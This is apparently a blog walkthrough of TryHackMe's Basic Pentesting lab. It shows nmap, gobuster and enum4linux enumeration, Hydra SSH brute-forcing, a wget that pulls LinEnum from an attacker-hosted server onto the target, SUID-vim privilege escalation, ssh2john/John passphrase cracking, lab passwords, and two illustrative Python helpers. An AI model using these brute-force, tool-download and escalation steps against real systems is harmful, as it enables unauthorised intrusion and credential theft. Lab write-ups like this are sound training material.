Hi! It is time to look at the Basic Pentesting room on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained from THM's rooms.
Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/basicpentestingjt
Task 1 (Web App Testing and Privilege Escalation)
In this set of tasks you’ll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux enumeration
Credits to Josiah Pierce from Vulnhub.
Questions
Deploy the machine and connect to our network
Answer: No answer needed
Find the services exposed by the machine
This time I decided to use the following command:
nmap -sC -sV -oN nmap -p- <target ip>
Here -sC runs the default NSE scripts, -sV probes each open port for the service and its version, -p- scans all 65535 TCP ports instead of nmap's default top 1000, and -oN nmap saves the normal output to a file called nmap.
The open ports are:
We can see an SSH service, SMB and a web server, and in addition AJP (the Apache JServ Protocol connector) and Tomcat.
And the script results:
Answer: No answer needed
What is the name of the hidden directory on the web server (enter name without /)?
There is a web server running on port 80:
We can take a look at the source code:
Dev section…hmm.
Let’s search for hidden directories with dirbuster or gobuster. We will use gobuster here, with the following command:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<target ip>
We found a development page. Maybe this is the one referred to in the source code!
Answer: development
User brute-forcing to find the username & password
Let’s have a look at the page we found:
Interesting. We get to see the files in the directory. Let’s have a look at both:
dev.txt:
j.txt:
A bunch of info here. We learn about Apache and SMB, but more importantly the author of dev.txt mentions Apache Struts, a Java web application framework, specifically version 2.5.12, and that the REST version is in use. An exact version string like this is the kind of detail worth writing down during enumeration.
In the other file we get a hint about weak credentials found in the /etc/shadow file.
But we don’t have access to the system yet!
Remember that we discovered SMB during the port scan? Let’s enumerate it, using the following command:
enum4linux <target ip>
This gives us a bunch of info on the SMB service:
We can see that a null session is allowed, i.e. anonymous access using an empty username and an empty password. A bit further below we read the following lines:
Jan and Kay. That sure sounds like the users mentioned in j.txt, so we can reasonably conclude that Jan is the one with the weak password.
Let’s try to brute-force Jan’s SSH login with Hydra, using the following command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target ip>
Hydra's default of 16 parallel connections is often more than an SSH server will accept cleanly; if you see connection errors, lower it with -t 4. Let it run for a bit and you will find the answer:
armando!
Answer: No answer needed
What is the username?
Answer: jan
BONUS:
We could also have found this by connecting to the anonymous share with smbclient:
If we read the text file inside it:
What is the password?
See above to find the cracked password.
Answer: armando
What service do you use to access the server(answer in abbreviation in all caps)?
We have seen an SSH service running.
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
We can now log in over SSH with the following command:
ssh jan@<ip>
Enter the password when prompted, and we land in jan’s home directory:
If we look around a bit we can get into Kay’s home directory as well:
We can see pass.bak, a backup file of some kind. Maybe a password?
To find privilege escalation vectors we can use a tool such as LinEnum, which automates the usual Linux enumeration checks. We need to do the following:
- Download LinEnum from here: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh (copy the raw text into a file called LinEnum).
- Start a simple Python web server from the directory containing the new file: python -m http.server 8000.
- Fetch the file from the target machine: wget http://<attacker ip>:8000/LinEnum
- Make the file executable: chmod +x LinEnum
- Run it!
Alternatively you can use scp to copy it over.
Read through the results. I will paste a few interesting tidbits here:
We can see that Kay is an admin.
We can read the passwd file, but not the shadow file.
Now this is interesting. vim.basic has the SUID bit set, which means it runs with the effective privileges of its owner (root) no matter who launches it. Since vim can open any file on disk, a SUID root vim lets us read files our own account is not allowed to read, including the pass.bak file from earlier. Note that a SUID editor is effectively full root: anything vim can read it can also write.
This is actually the answer to the final question!
We can now switch to kay with the new password:
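To show what LinEnum's SUID check is actually doing, here is an added Python example (not code from the post or from LinEnum) that walks a directory tree and reports every set-uid file with its owner, the equivalent of `find / -perm -4000 -type f 2>/dev/null`. It builds a constructed sample tree in a temporary directory with placeholder files so that it runs offline; on the target you would point find_suid at /. The names vim.basic and pass.bak mirror the layout discussed above and are part of the constructed sample.

```python
import os
import stat
import tempfile

CURRENT_UID = os.getuid()


def find_suid(root):
    """Walk `root` and return one record per regular file with the set-uid bit
    (the equivalent of `find ROOT -perm -4000 -type f 2>/dev/null`)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable entry, like the 2>/dev/null in find
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            hits.append({
                "path": path,
                "name": name,
                "uid": st.st_uid,
                # A SUID binary owned by uid 0 runs with euid 0 for anyone who
                # can execute it; that is the case that matters for privesc.
                "root_owned": st.st_uid == 0,
                "world_exec": bool(st.st_mode & stat.S_IXOTH),
            })
    return sorted(hits, key=lambda h: h["path"])


def make_demo_tree():
    """Constructed sample tree (placeholder files, not real binaries): an
    ordinary binary, a SUID vim.basic and an owner-only backup file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    layout = {
        "usr/bin/ls": 0o755,
        "usr/bin/vim.basic": 0o4755,  # SUID bit set: the interesting one
        "home/kay/pass.bak": 0o640,   # owner-readable only, like pass.bak
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for hit in find_suid(make_demo_tree()):
        owner = "root" if hit["root_owned"] else str(hit["uid"])
        print(f"{hit['path']}  owner={owner} world_exec={hit['world_exec']}")
```

In the sample tree the files are owned by whoever runs the script, so root_owned is only True when you run it as root; on a real target the list to care about is the root-owned, world-executable entries that are not part of the distribution's default SUID set.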
Answer: No answer needed
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Well, here’s the thing. I already answered the final question. But on a more thorough look we find something interesting in Kay’s .ssh directory: there is a private key!
We can try logging in with it:
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa
Unfortunately the key is protected by a passphrase, which we don’t have:
We can crack it with John the Ripper, specifically the ssh2john helper that converts the key file into a hash John understands. It is located here:
Let’s run the following command after copying the key to your attacker machine as kay_id_rsa:
/opt/john/ssh2john.py kay_id_rsa > john_hash.txt
Now we can run John:
john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
And we find the passphrase:
Now we can log in:
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa
and enter the passphrase: beeswax.
This was another way in!
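Why ssh2john plus john works at all, and why it can be quick, is visible in the key file itself: a passphrase-protected key advertises its cipher and key-derivation function in the clear, and only the derivation cost decides how long cracking takes. The following is an added Python example (not code from the post, from ssh2john or from John) that reads the two formats OpenSSH writes: the legacy PEM format, where a Proc-Type: 4,ENCRYPTED header and a DEK-Info header signal encryption and the key is derived with OpenSSL's EVP_BytesToKey (one MD5 iteration, salted with the IV), and the newer openssh-key-v1 format, which records the cipher, the KDF (bcrypt) and the round count. The sample keys are constructed placeholders with no real key material, and build_openssh_header emits only the header fields the check needs.

```python
import base64
import struct

# Constructed sample keys: the base64 bodies are placeholders, not key material.
# Legacy PEM: optional RFC 1421 headers, a blank line, then the base64 body.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""
LEGACY_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf: bytes, off: int):
    """Decode an SSH wire 'string' at offset `off`; returns (bytes, new_off)."""
    if off + 4 > len(buf):
        raise ValueError("truncated key blob")
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated key blob")
    return buf[off:off + n], off + n


def build_openssh_header(cipher: bytes, kdf: bytes, rounds: int = 16) -> str:
    """Build just the header of an openssh-key-v1 blob (constructed test input).
    A real key continues with the public and private key sections after the
    key count; they play no part in detecting encryption, so they are omitted."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = (b"openssh-key-v1\x00"
            + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1))  # number of keys
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


OPENSSH_ENCRYPTED = build_openssh_header(b"aes256-ctr", b"bcrypt", rounds=16)
OPENSSH_PLAIN = build_openssh_header(b"none", b"none")


def inspect_private_key(text: str) -> dict:
    """Report whether a PEM-armored SSH private key needs a passphrase, and
    which cipher/KDF protects it, without knowing the passphrase."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") \
            or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-armored key")
    label = lines[0][len("-----BEGIN "):].strip("- ")
    body = lines[1:-1]

    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(magic)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        info = {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": None}
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (info["rounds"],) = struct.unpack(">I", kdfopts[o:o + 4])
        return info

    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled by headers,
    # and the key is derived from the passphrase by OpenSSL's EVP_BytesToKey,
    # a single MD5 iteration salted with the IV, which is why these crack fast.
    headers = {}
    for ln in body:
        if ":" not in ln:
            break  # first base64 line ends the header block
        key, val = ln.split(":", 1)
        headers[key.strip()] = val.strip()
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    cipher = headers["DEK-Info"].split(",")[0] if encrypted and "DEK-Info" in headers else "none"
    return {"format": label, "encrypted": encrypted, "cipher": cipher,
            "kdf": "EVP_BytesToKey(MD5)" if encrypted else "none",
            "rounds": 1 if encrypted else None}


if __name__ == "__main__":
    for name, sample in [("legacy", LEGACY_ENCRYPTED), ("openssh", OPENSSH_ENCRYPTED)]:
        print(name, inspect_private_key(sample))
```

If the report says the key is unencrypted there is nothing to crack, just use it with -i. If it says bcrypt with 16 rounds (ssh-keygen's default for the new format), budget far more time per candidate than for a legacy MD5-derived key before pointing john at rockyou.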
Answer: No answer needed
What is the final password you obtain?
We found this earlier by reading pass.bak through the SUID vim.
Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy
Thanks for reading. Hopefully you found out that there is more than one way into the same account 🙂